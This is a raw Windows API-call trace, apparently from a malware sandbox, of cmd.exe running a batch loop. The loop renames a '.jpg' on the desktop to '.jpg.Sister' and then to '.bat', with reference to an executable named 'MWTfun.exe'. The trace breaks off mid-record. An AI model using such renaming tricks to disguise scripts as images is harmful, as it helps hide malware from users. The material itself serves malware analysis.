GetProcessHeap () returned 0x21ed8c70000 [0123.274] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8ceeaf0 [0123.274] GetProcessHeap () returned 0x21ed8c70000 [0123.274] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ceeaf0, Size=0x290) returned 0x21ed8ceeaf0 [0123.274] GetProcessHeap () returned 0x21ed8c70000 [0123.274] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ceeaf0) returned 0x290 [0123.274] GetProcessHeap () returned 0x21ed8c70000 [0123.274] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8ceed90 [0123.274] GetProcessHeap () returned 0x21ed8c70000 [0123.274] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ceed90, Size=0x30) returned 0x21ed8ceed90 [0123.274] GetProcessHeap () returned 0x21ed8c70000 [0123.274] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ceed90) returned 0x30 [0123.275] GetProcessHeap () returned 0x21ed8c70000 [0123.275] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8ceedd0 [0123.275] malloc (_Size=0x1ff9c) returned 0x21ed8ef0880 [0123.279] GetProcessHeap () returned 0x21ed8c70000 [0123.279] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7bad0 [0123.279] ??_V@YAXPEAX@Z () returned 0x1 [0123.280] malloc (_Size=0x1ff9c) returned 0x21ed8ef0880 [0123.284] GetFullPathNameW (in: lpFileName="23wggka_3I9jMmhYgMoj.jpg", nBufferLength=0xffce, lpBuffer=0x21ed8ef0880, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\23wggka_3I9jMmhYgMoj.jpg", lpFilePart=0xa6cf4fe1c8*="23wggka_3I9jMmhYgMoj.jpg") returned 0x30 [0123.284] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0123.284] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0123.285] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cee0 [0123.285] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0123.285] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7242029c, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7242029c, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0123.285] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0123.285] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\23wggka_3I9jMmhYgMoj.jpg", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b6def0, ftCreationTime.dwHighDateTime=0x1d5e4d2, ftLastAccessTime.dwLowDateTime=0xd3f2e690, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xd3f2e690, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x1463, dwReserved0=0x4, dwReserved1=0x80, cFileName="23wggka_3I9jMmhYgMoj.jpg", cAlternateFileName="23WGGK~1.JPG")) returned 0x21ed8c7ca00 [0123.286] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0123.286] _wcsnicmp (_String1="23WGGK~1.JPG", _String2="23wggka_3I9jMmhYgMoj.jpg", _MaxCount=0x18) returned 29 [0123.286] malloc (_Size=0x1ff9c) returned 0x21ed8f10830 [0123.288] ??_V@YAXPEAX@Z () returned 0x21ed8f10830 [0123.290] GetProcessHeap () returned 0x21ed8c70000 [0123.290] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7c160 [0123.290] ??_V@YAXPEAX@Z () returned 0x1 [0123.290] ??_V@YAXPEAX@Z () returned 0x1 [0123.291] GetProcessHeap () returned 0x21ed8c70000 [0123.291] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8ceedd0, Size=0x200) returned 0x21ed8ceedd0 [0123.292] GetProcessHeap () returned 0x21ed8c70000 [0123.292] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8ceedd0) returned 0x200 [0123.292] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0123.292] _get_osfhandle (_FileHandle=1) returned 0x50 [0123.292] GetFileType (hFile=0x50) returned 0x2 [0123.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0123.292] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0123.437] _get_osfhandle (_FileHandle=1) returned 0x50 [0123.437] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0123.612] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0123.612] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0123.612] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0123.612] _get_osfhandle (_FileHandle=1) returned 0x50 [0123.612] GetFileType (hFile=0x50) returned 0x2 [0123.612] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0123.612] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0123.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0123.971] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0124.145] _get_osfhandle (_FileHandle=1) returned 0x50 [0124.145] GetFileType (hFile=0x50) returned 0x2 [0124.145] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0124.145] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0124.291] _get_osfhandle (_FileHandle=1) returned 0x50 [0124.291] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cee8b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cee8b0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0124.475] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"23wggka_3I9jMmhYgMoj.jpg\" \"23wggka_3I9jMmhYgMoj.jpg.Sister\" ") returned 62 [0124.475] _get_osfhandle (_FileHandle=1) returned 0x50 [0124.475] GetFileType (hFile=0x50) returned 0x2 [0124.475] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0124.475] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0124.681] _get_osfhandle (_FileHandle=1) returned 0x50 [0124.681] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0125.183] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0125.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0125.183] GetFileType (hFile=0x50) returned 0x2 [0125.183] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0125.183] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0125.437] _get_osfhandle (_FileHandle=1) returned 0x50 [0125.437] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0125.632] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0125.632] _get_osfhandle (_FileHandle=1) returned 0x50 [0125.632] GetFileType (hFile=0x50) returned 0x2 [0125.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0125.632] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0125.947] _get_osfhandle (_FileHandle=1) returned 0x50 [0125.947] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0126.225] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0126.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0126.225] GetFileType (hFile=0x50) returned 0x2 [0126.225] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0126.225] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0127.122] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.122] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0127.477] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0127.477] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.477] GetFileType (hFile=0x50) returned 0x2 [0127.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0127.477] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0128.191] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.191] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0128.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.520] GetFileType (hFile=0x50) returned 0x2 [0128.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0128.521] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0128.878] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.878] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8ceeda0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8ceeda0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0128.975] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"23wggka_3I9jMmhYgMoj.jpg.Sister\" \"23wggka_3I9jMmhYgMoj.bat\" ") returned 62 [0128.975] _get_osfhandle (_FileHandle=1) returned 0x50 [0128.975] GetFileType (hFile=0x50) returned 0x2 [0128.975] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0128.975] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0129.260] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.260] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3e) returned 1 [0129.447] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0129.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.447] GetFileType (hFile=0x50) returned 0x2 [0129.448] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0129.450] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0129.581] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.581] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0129.747] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0130.031] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0130.032] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0130.032] malloc (_Size=0xffce) returned 0x21ed8ef0880 [0130.033] ??_V@YAXPEAX@Z () returned 0x21ed8ef0880 [0130.034] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0130.034] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0130.034] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0130.034] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0130.034] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0130.034] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0130.034] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0130.034] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0130.035] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0130.035] ??_V@YAXPEAX@Z () returned 0x1 [0130.035] GetProcessHeap () returned 0x21ed8c70000 [0130.035] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8cdafd0 [0130.035] GetProcessHeap () returned 0x21ed8c70000 [0130.035] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdafd0, Size=0x8c) returned 0x21ed8cdafd0 [0130.035] GetProcessHeap () returned 0x21ed8c70000 [0130.035] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdafd0) returned 0x8c [0130.035] GetProcessHeap () returned 0x21ed8c70000 [0130.035] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x94) returned 0x21ed8cdb070 [0130.035] GetProcessHeap () returned 0x21ed8c70000 [0130.035] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8cdb110 [0130.035] GetProcessHeap () returned 0x21ed8c70000 [0130.036] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdb110, Size=0x8c) returned 0x21ed8cdb110 [0130.036] GetProcessHeap () returned 0x21ed8c70000 [0130.036] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdb110) returned 0x8c [0130.036] malloc (_Size=0xffce) returned 0x21ed8ef0880 [0130.036] ??_V@YAXPEAX@Z () returned 0x21ed8ef0880 [0130.036] GetProcessHeap () returned 0x21ed8c70000 [0130.036] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7c9a0 [0130.036] GetProcessHeap () returned 0x21ed8c70000 [0130.036] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdb1b0 [0130.036] _wcsicmp (_String1="23wggka_3I9jMmhYgMoj.jpg", _String2=".") returned 4 [0130.036] _wcsicmp (_String1="23wggka_3I9jMmhYgMoj.jpg", _String2="..") returned 4 [0130.036] GetFileAttributesW (lpFileName="23wggka_3I9jMmhYgMoj.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\23wggka_3i9jmmhygmoj.jpg")) returned 0x20 [0130.037] GetProcessHeap () returned 0x21ed8c70000 [0130.037] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8ceefe0 [0130.039] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8ceeff0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0130.039] SetErrorMode (uMode=0x0) returned 0x0 [0130.039] SetErrorMode (uMode=0x1) returned 0x0 [0130.039] GetFullPathNameW (in: lpFileName="23wggka_3I9jMmhYgMoj.jpg", nBufferLength=0x7fe7, lpBuffer=0x21ed8ef0880, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\23wggka_3I9jMmhYgMoj.jpg", lpFilePart=0xa6cf4fd660*="23wggka_3I9jMmhYgMoj.jpg") returned 0x30 [0130.040] SetErrorMode (uMode=0x0) returned 0x1 [0130.040] GetProcessHeap () returned 0x21ed8c70000 [0130.040] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8cdb420 [0130.040] _wcsicmp (_String1="23wggka_3I9jMmhYgMoj.jpg", _String2=".") returned 4 [0130.040] _wcsicmp (_String1="23wggka_3I9jMmhYgMoj.jpg", _String2="..") returned 4 [0130.040] GetFileAttributesW (lpFileName="23wggka_3I9jMmhYgMoj.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\23wggka_3i9jmmhygmoj.jpg")) returned 0x20 [0130.040] ??_V@YAXPEAX@Z () returned 0x1 [0130.040] malloc (_Size=0xffce) returned 0x21ed8ef0880 [0130.040] ??_V@YAXPEAX@Z () returned 0x21ed8ef0880 [0130.040] malloc (_Size=0xffce) returned 0x21ed8f00860 [0130.040] ??_V@YAXPEAX@Z () returned 0x21ed8f00860 [0130.041] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\23wggka_3I9jMmhYgMoj.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\23wggka_3i9jmmhygmoj.jpg")) returned 0x20 [0130.041] malloc (_Size=0xffce) returned 0x21ed8f10840 [0130.041] ??_V@YAXPEAX@Z () returned 0x21ed8f10840 [0130.042] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\23wggka_3I9jMmhYgMoj.jpg", fInfoLevelId=0x1, lpFindFileData=0x21ed8cdb1c0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed8cdb1c0) returned 0x21ed8c7cee0 [0130.042] malloc (_Size=0xffce) returned 0x21ed8f20820 [0130.042] ??_V@YAXPEAX@Z () returned 0x21ed8f20820 [0130.043] ??_V@YAXPEAX@Z () returned 0x1 [0130.043] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\23wggka_3I9jMmhYgMoj.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\23wggka_3i9jmmhygmoj.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\23wggka_3I9jMmhYgMoj.jpg.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\23wggka_3i9jmmhygmoj.jpg.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0130.096] FindNextFileW (in: hFindFile=0x21ed8c7cee0, lpFindFileData=0x21ed8cdb1c0 | out: lpFindFileData=0x21ed8cdb1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72b6def0, ftCreationTime.dwHighDateTime=0x1d5e4d2, ftLastAccessTime.dwLowDateTime=0xd3f2e690, ftLastAccessTime.dwHighDateTime=0x1d5e0c8, ftLastWriteTime.dwLowDateTime=0xd3f2e690, ftLastWriteTime.dwHighDateTime=0x1d5e0c8, nFileSizeHigh=0x0, nFileSizeLow=0x1463, dwReserved0=0x0, dwReserved1=0x0, cFileName="23wggka_3I9jMmhYgMoj.jpg", cAlternateFileName="")) returned 0 [0130.097] GetLastError () returned 0x12 [0130.097] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0130.097] ??_V@YAXPEAX@Z () returned 0x1 [0130.098] ??_V@YAXPEAX@Z () returned 0x1 [0130.099] ??_V@YAXPEAX@Z () returned 0x1 [0130.104] ??_V@YAXPEAX@Z () returned 0x1 [0130.104] GetProcessHeap () returned 0x21ed8c70000 [0130.104] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cd00 [0130.104] GetProcessHeap () returned 0x21ed8c70000 [0130.104] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95840, Size=0x16) returned 0x21ed8c95480 [0130.104] GetProcessHeap () returned 0x21ed8c70000 [0130.104] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95480) returned 0x16 [0130.104] GetProcessHeap () returned 0x21ed8c70000 [0130.104] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0130.104] GetProcessHeap () returned 0x21ed8c70000 [0130.104] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0130.104] GetProcessHeap () returned 0x21ed8c70000 [0130.104] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8cdb690 [0130.104] GetProcessHeap () returned 0x21ed8c70000 [0130.104] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cdb690, Size=0xb2) returned 0x21ed8cdb690 [0130.105] GetProcessHeap () returned 0x21ed8c70000 [0130.105] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cdb690) returned 0xb2 [0130.105] GetProcessHeap () returned 0x21ed8c70000 [0130.105] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cfefd0 [0130.105] GetProcessHeap () returned 0x21ed8c70000 [0130.105] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cfefd0, Size=0x30) returned 0x21ed8cfefd0 [0130.105] GetProcessHeap () returned 0x21ed8c70000 [0130.105] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cfefd0) returned 0x30 [0130.105] GetProcessHeap () returned 0x21ed8c70000 [0130.105] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cff010 [0130.105] malloc (_Size=0x1ff9c) returned 0x21ed8ef0880 [0130.108] GetProcessHeap () returned 0x21ed8c70000 [0130.108] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96b80 [0130.108] GetProcessHeap () returned 0x21ed8c70000 [0130.108] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed8c96640 [0130.108] ??_V@YAXPEAX@Z () returned 0x1 [0130.109] malloc (_Size=0x1ff9c) returned 0x21ed8ef0880 [0130.113] GetProcessHeap () returned 0x21ed8c70000 [0130.113] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed8c96700 [0130.113] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed8ef0880, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0130.113] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cdb0d0, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0130.113] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0130.113] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8cdb0d0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cee0 [0130.113] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0130.113] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, 